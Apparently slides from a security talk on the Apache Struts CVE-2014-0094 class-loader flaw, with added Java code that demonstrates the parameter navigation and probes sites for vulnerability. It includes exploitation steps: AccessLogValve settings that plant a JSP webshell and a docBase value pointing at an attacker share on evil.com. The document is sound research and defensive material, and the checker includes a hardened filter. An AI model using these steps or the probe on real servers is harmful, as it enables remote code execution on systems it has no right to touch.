Apache Struts?
• Java framework for Java webapps
• Two major versions
– Struts 1.x (EoL since 2013)
– Struts 2.x
Why Struts?
• (Mar 2014) CVE-2014-0094 goes public
• What the hell was it?
– Struts 2 vulnerability
– Unauthenticated
– All versions affected (2.0.0 through 2.3.16 at the time of disclosure)
– Could lead to RCE
CVE-2014-0094: "ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation"
• Credits:
– Peter Magnusson
– Przemysław Celej
• After reading it…
– Let's learn some basics first
OGNL: Object Graph Navigation Language
• Expression language for getting and setting properties of Java objects
– Objects that are stored in the Context
• Named objects in the Context are reached with "#"; a bare property name is resolved against the root object (qux in the figure):
  #foo.dummy           // foo.getDummy()
  #bar.dummy           // bar.getDummy()
  dummy                // qux.getDummy()
  dummy = "RootedCON"  // qux.setDummy("RootedCON")
• In Struts 2 the OGNL Context is the ActionContext and the root is the ValueStack: a stack of objects (foo, bar, qux, …) searched from the top down, with the action being executed on top, so a bare "dummy" normally ends up in the action's getDummy()
Struts 2 request processing
[Figure: the user requests http://struts.example.com/example/hello.action; inside the Struts 2 app the request passes through the Filter Dispatcher, the Interceptors (ParametersInterceptor among them), the Action and the Result, and the resulting HTML goes back to the user]
ParametersInterceptor
"This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)"
"Because parameter names are effectively OGNL statements, it is important that security be taken into account"
http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html
Available methods
• Methods that can be reached: as seen, OGNL allows us to reference getters and setters
• HelloWorldAction: execute(), getUsername(), setUsername()
• extends ActionSupport: …, getErrors(), getTexts(), getFieldErrors(), getActionErrors(), getActionMessages(), getErrorMessages(), …
• extends Object: …, getClass(), …
Navigating objects
• Parameters are evaluated iteratively as an AST chain, composed of
– A chain of getters (without parameters)
– Ending with a setter (one String, boolean or int parameter)
Looking for setters
• Through object navigation, several setter methods that are not part of the Action can be reached
– What methods?
• Post published by neobyte: http://sec.baidu.com/index.php?research/detail/id/18
1. PoC for getting reachable setters
2. A method for getting RCE on Tomcat 8
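What the two slides above describe, as an added example in Java (my own code, not the talk's material, not Struts and not the neobyte PoC): a minimal ParametersInterceptor-like resolver that turns a dotted parameter name into a chain of getters ending in a setter, a toy HelloWorldAction standing in for the one on the slides (assumption: a single username property), a breadth-first enumeration of the setters reachable from a class through getters, and a hardened variant that rejects any segment named class. On a plain JDK the walk reaches the action's class loader through class.classLoader.defaultAssertionStatus; inside Tomcat the same walk reaches the container objects the later slides abuse.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.*;
import java.util.regex.Pattern;

public class ParamNavigation {

    // Stand-in for the slides' HelloWorldAction (assumption: one "username" property); getClass() comes from Object.
    public static class HelloWorldAction {
        private String username;
        public String getUsername() { return username; }
        public void setUsername(String u) { username = u; }
    }

    static boolean convertible(Class<?> t) {
        return t == String.class || t == int.class || t == long.class || t == boolean.class;
    }

    static Object convert(Class<?> t, String v) {
        if (t == int.class) return Integer.valueOf(v);
        if (t == long.class) return Long.valueOf(v);
        if (t == boolean.class) return Boolean.valueOf(v);
        return v;
    }

    // Bean naming rule: property "classLoader" -> method getClassLoader / setClassLoader.
    static Method accessor(Class<?> c, String prefix, String prop, int nParams) {
        String name = prefix + Character.toUpperCase(prop.charAt(0)) + prop.substring(1);
        for (Method m : c.getMethods())
            if (m.getName().equals(name) && m.getParameterCount() == nParams && !Modifier.isStatic(m.getModifiers()))
                return m;
        return null;
    }

    // Vulnerable behaviour: every segment but the last is a getter invoked on the runtime class of
    // the current object, the last segment is a setter. Nothing stops the walk leaving the action via getClass().
    static void setParameter(Object root, String param, String value) throws Exception {
        String[] seg = param.split("\\.");
        Object cur = root;
        for (int i = 0; i < seg.length - 1; i++) {
            Method g = accessor(cur.getClass(), "get", seg[i], 0);
            if (g == null) throw new NoSuchMethodException("no getter for '" + seg[i] + "'");
            cur = g.invoke(cur);
            if (cur == null) throw new NullPointerException("'" + seg[i] + "' is null");
        }
        Method s = accessor(cur.getClass(), "set", seg[seg.length - 1], 1);
        if (s == null || !convertible(s.getParameterTypes()[0]))
            throw new NoSuchMethodException("no usable setter for '" + seg[seg.length - 1] + "'");
        s.invoke(cur, convert(s.getParameterTypes()[0], value));
    }

    // Hardened variant: reject the name before any reflection runs. The pattern is my own and covers
    // only this toy's dotted syntax; real OGNL also accepts ['class'] indexing, which a filter must block too.
    static final Pattern FORBIDDEN = Pattern.compile("(^|\\.)[cC]lass(\\.|$)");

    static void setParameterHardened(Object root, String param, String value) throws Exception {
        if (FORBIDDEN.matcher(param).find())
            throw new IllegalArgumentException("rejected parameter name: " + param);
        setParameter(root, param, value);
    }

    // Breadth-first list of setter paths reachable from a class through getter chains (the idea of the
    // neobyte PoC). It follows declared return types, so container classes such as Tomcat's class loader
    // with its getResources() only show up when the walk runs inside that container, on the real objects.
    static List<String> reachableSetters(Class<?> start, int maxDepth) {
        List<String> found = new ArrayList<>();
        Deque<Object[]> queue = new ArrayDeque<>();   // entries: {Class, path prefix, depth}
        Set<Class<?>> seen = new HashSet<>(Collections.singletonList(start));
        queue.add(new Object[]{start, "", 0});
        while (!queue.isEmpty()) {
            Object[] n = queue.poll();
            Class<?> c = (Class<?>) n[0]; String path = (String) n[1]; int depth = (Integer) n[2];
            for (Method m : c.getMethods()) {
                String name = m.getName();
                if (Modifier.isStatic(m.getModifiers()) || name.length() < 4) continue;
                String prop = Character.toLowerCase(name.charAt(3)) + name.substring(4);
                Class<?>[] pt = m.getParameterTypes();
                if (name.startsWith("set") && pt.length == 1 && convertible(pt[0]))
                    found.add(path + prop + " (" + pt[0].getSimpleName() + ")");
                Class<?> r = m.getReturnType();
                if (name.startsWith("get") && pt.length == 0 && depth < maxDepth
                        && !r.isPrimitive() && !r.isArray() && seen.add(r))
                    queue.add(new Object[]{r, path + prop + ".", depth + 1});
            }
        }
        return found;
    }

    public static void main(String[] args) throws Exception {
        HelloWorldAction action = new HelloWorldAction();
        setParameter(action, "username", "rooted");   // intended use: setUsername("rooted")
        System.out.println("username=" + action.getUsername());
        // Same code path, now Object.getClass() -> Class.getClassLoader() -> ClassLoader.setDefaultAssertionStatus(boolean):
        // a request parameter has just reconfigured the application's class loader.
        setParameter(action, "class.classLoader.defaultAssertionStatus", "true");
        System.out.println("class loader reached through a parameter name");
        try { setParameterHardened(action, "class.classLoader.defaultAssertionStatus", "true"); }
        catch (IllegalArgumentException e) { System.out.println(e.getMessage()); }
        for (String p : reachableSetters(HelloWorldAction.class, 3))
            System.out.println("reachable setter: " + p);
    }
}
```

Run it with `java ParamNavigation.java` (JDK 11+ source launcher) or compile with javac. The enumeration is the interesting part to repeat inside a real container: start it from the action's runtime class loader (`action.getClass().getClassLoader().getClass()`) and the Tomcat-specific resources and pipeline setters appear, which is how the docBase and AccessLogValve chains on the next slides are found.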
DEMO
• Struts Tester on Tomcat 6/7 & Tomcat 8
– Customized & commented version ready to use: https://github.com/julianvilas/rooted2k15
Exploitability
Tested against:
• Tomcat 6/7 → RCE via "docBase" (Windows only)
• Tomcat 8 → RCE via "AccessLogValve"
• GlassFish 4 → RCE via "docBase" (Windows only)
• WebSphere 8.5 (developer) → RCE not found
• WebLogic 10 & 12 → RCE not found
• JBoss 7.1 & 7.4 → RCE not found
What about Struts 1?
• According to CVE-2014-0114, Struts 1 is also vulnerable
• Unpatched! (Struts 1 is past EoL, but is still in use)
• Different root cause: Struts 1 has neither OGNL nor a ValueStack
– The key: bean population with BeanUtils
• You can find some Alvaro Muñoz (@pwntester) gold, like further explanation and a filter to be applied as a workaround, at
– http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
– http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q
AccessLogValve exploitation
• A log file named shell1.jsp is created under webapps/ROOT. When a nonexistent URL is requested, the request (URL included) is written into that log file, which is interpreted as a JSP when it is accessed.
• Four AccessLogValve properties are set through the parameter chain (the parameter-name prefix is cut off on the slide):
1. .directory=webapps/ROOT
2. .prefix=shell
3. .suffix=.jsp
4. .fileDateFormat=1
• The log file name is prefix + date stamp + suffix; "1" contains no SimpleDateFormat pattern letters, so the date stamp is the literal "1" and the file becomes shell1.jsp
DEMO
• AccessLogValve exploitation
• https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb
docBase exploitation
• "The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file)."
• The legitimate application goes down, since its document base now points somewhere else
• .docBase=//evil.com/shared (a UNC share, which is why this path is Windows only)
About the Metasploit module
• Tomcat 6/7 & GlassFish (docBase)
– Windows only
– Not landed in trunk yet, but works fine
– Matthew Hall (0x41414141) pull requests:
https://github.com/rapid7/metasploit-framework/pull/3074
https://github.com/rapid7/metasploit-framework/pull/3075
https://github.com/rapid7/metasploit-framework/pull/3323
– Same module as before, landed the night before this talk
Searching Struts sites
• Dumb detection of Struts 2 sites
– Default extension for Struts 2: ".action"
• Also, with the default configuration, it accepts both ".action" and no extension
• https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html
Vulnerability checking
• To check whether a Struts 2 site is vulnerable, modify the "cacheMaxSize" property of the Tomcat resources object reached through the class loader
– Integer.MAX_VALUE == 2147483647 (a Java int is 32 bits on every platform, so this does not depend on the CPU)
• Tomcat 6/7 & GlassFish (int setter): 2147483647 converts, 2147483648 does not
• Tomcat 8 (the setter takes a long, so an out-of-range int still converts): 2147483647 converts, AAAAAAAAA does not
• A value that converts leaves the response as it was; one that fails conversion changes it, which tells a reached setter apart from a parameter that is simply ignored
• In Struts 1, if the String-to-Integer conversion fails, a default value of 0 is set
• But when trying to set a method that receives an Object with a String, an exception is raised
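The Struts 2 check from this slide as an added Java example (my own code, not the talk's Struts Tester and not the Metasploit module). Assumptions: the full parameter paths (the slide names only the cacheMaxSize property; the two paths below are the ones I know from the public Metasploit module for this bug and must be confirmed against the target), a target that serves the action on GET, and, when no URL is given, a constructed in-memory stand-in for a vulnerable Tomcat 7 so the program runs offline.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;
import java.util.*;
import java.util.function.Function;

public class StrutsClassLoaderCheck {

    // What the comparison looks at: status code plus body size as a coarse page fingerprint.
    static final class Response {
        final int status, bodyLength;
        Response(int status, int bodyLength) { this.status = status; this.bodyLength = bodyLength; }
        boolean sameAs(Response o) { return status == o.status && bodyLength == o.bodyLength; }
    }

    // One probe: the parameter to set, a value its setter accepts and one whose conversion
    // must fail. The parameter paths are assumptions (only "cacheMaxSize" is on the slide).
    static final class Probe {
        final String label, param, good, bad;
        Probe(String label, String param, String good, String bad) {
            this.label = label; this.param = param; this.good = good; this.bad = bad;
        }
    }

    static final List<Probe> PROBES = Arrays.asList(
        new Probe("Tomcat 6/7, GlassFish (setCacheMaxSize(int))",
                  "class.classLoader.resources.dirContext.cacheMaxSize", "2147483647", "2147483648"),
        new Probe("Tomcat 8 (setCacheMaxSize(long), so only a non-number fails)",
                  "class.classLoader.resources.cacheMaxSize", "2147483647", "AAAAAAAAA"));

    // A parameter that reaches no setter is dropped by ParametersInterceptor, so both probe
    // values behave like the baseline request. If the accepted value behaves like the baseline
    // but the unconvertible one does not, the setter was reached and the conversion error
    // changed the outcome of the action.
    static String check(Function<Map<String, String>, Response> send) {
        Response base = send.apply(Collections.emptyMap());
        for (Probe p : PROBES) {
            Response good = send.apply(Collections.singletonMap(p.param, p.good));
            Response bad = send.apply(Collections.singletonMap(p.param, p.bad));
            if (good.sameAs(base) && !bad.sameAs(base)) return "VULNERABLE: " + p.label;
        }
        return "NOT DETECTED (or the page is too dynamic for a size comparison)";
    }

    // Real sender: GET actionUrl with the probe appended to the query string.
    static Function<Map<String, String>, Response> httpSender(String actionUrl) {
        return params -> {
            try {
                StringBuilder q = new StringBuilder(actionUrl);
                String sep = actionUrl.contains("?") ? "&" : "?";
                for (Map.Entry<String, String> e : params.entrySet()) {
                    q.append(sep).append(URLEncoder.encode(e.getKey(), "UTF-8"))
                     .append('=').append(URLEncoder.encode(e.getValue(), "UTF-8"));
                    sep = "&";
                }
                HttpURLConnection c = (HttpURLConnection) new URL(q.toString()).openConnection();
                c.setInstanceFollowRedirects(false);
                int status = c.getResponseCode();
                int len = 0;
                try (InputStream in = status < 400 ? c.getInputStream() : c.getErrorStream()) {
                    byte[] buf = new byte[8192];
                    for (int n; in != null && (n = in.read(buf)) > 0; ) len += n;
                }
                return new Response(status, len);
            } catch (IOException e) {
                throw new UncheckedIOException(e);
            }
        };
    }

    // Offline stand-in for a vulnerable Tomcat 7 host (constructed, no network): the int setter
    // accepts 2147483647, while 2147483648 fails conversion and the action ends on an error page.
    static Function<Map<String, String>, Response> simulatedTomcat7() {
        return params -> {
            String v = params.get("class.classLoader.resources.dirContext.cacheMaxSize");
            if (v == null) return new Response(200, 1234);
            try { Integer.parseInt(v); return new Response(200, 1234); }
            catch (NumberFormatException e) { return new Response(500, 2048); }
        };
    }

    public static void main(String[] args) {
        Function<Map<String, String>, Response> sender =
            args.length > 0 ? httpSender(args[0]) : simulatedTomcat7();
        System.out.println(check(sender));
    }
}
```

Without arguments it prints the verdict for the simulated host; with an action URL as the first argument it sends four requests (baseline, then accepted and unconvertible value per probe). The body-length fingerprint is deliberately crude: against a page with per-request content (timestamps, tokens) compare status codes only, or strip the varying parts before comparing, otherwise the baseline never matches and the check reports nothing.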
Previous security bulletins
• RCE, when form validation fails field values are interpreted as OGNL
• RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
• RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL (the S2-003 fix was incomplete)
• RCE, user's input is evaluated as OGNL when there is a conversion error
• Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
• RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor
• RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
• RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL
• RCE, same as S2-013, incomplete fix
• RCE, actions using wildcards and double OGNL evaluation allow OGNL injection
• RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
• RCE, what we saw in this presentation ☺ (ParametersInterceptor)
• RCE, incomplete fix for S2-020
• Incomplete fix for S2-020 and S2-021
Conclusions?
• Seven years between S2-001 and S2-020
• Same kind of vulnerability every time: injecting OGNL from user-supplied data
• Several bypasses of the fixes
• Almost all RCE
• Draw your own…
Bonus track - Confluence
• It is based on a WebWork fork (WebWork predates Struts 2)
• If you look at their bulletins:
– Versions up to and including 5.5.1 are vulnerable to ClassLoader manipulation: https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
– Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation: https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
• Don't they look familiar? ☺